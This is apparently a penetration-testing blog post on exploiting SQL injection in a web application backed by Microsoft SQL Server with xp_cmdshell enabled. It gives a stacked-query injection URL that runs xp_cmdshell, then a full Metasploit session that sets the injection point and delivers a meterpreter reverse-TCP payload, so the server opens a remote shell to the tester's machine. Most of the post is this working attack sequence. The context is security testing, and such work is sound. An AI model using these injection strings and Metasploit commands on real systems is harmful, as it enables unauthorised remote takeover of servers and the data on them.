In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker.
Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures:
http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell ‘ping 192.168.1.64’;–
If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module.
TheÂ mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester.
It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above:
msf > use windows/mssql/mssql_payload_sqli msf exploit(mssql_payload_sqli) >
set GET_PATH http://192.168.1.66/ showproduct.asp?id=1;[SQLi];--
GET_PATH => http://192.168.1.66/ showproduct.asp?id=1;[SQLi];--
msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66 RHOST => 192.168.1.66 msf exploit(mssql_payload_sqli) >
set PAYLOAD windows/patchupmeterpreter/reverse_tcp PAYLOAD => windows/patchupmeterpreter/reverse_tcp msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64 LHOST => 192.168.1.64 msf exploit(mssql_payload_sqli) > set LPORT 80 LPORT => 80 msf exploit(mssql_payload_sqli) > exploit
After the exploitation the attacker will get a meterpreter shell.
If you want to use this code you can download it from Secforce security tools repository.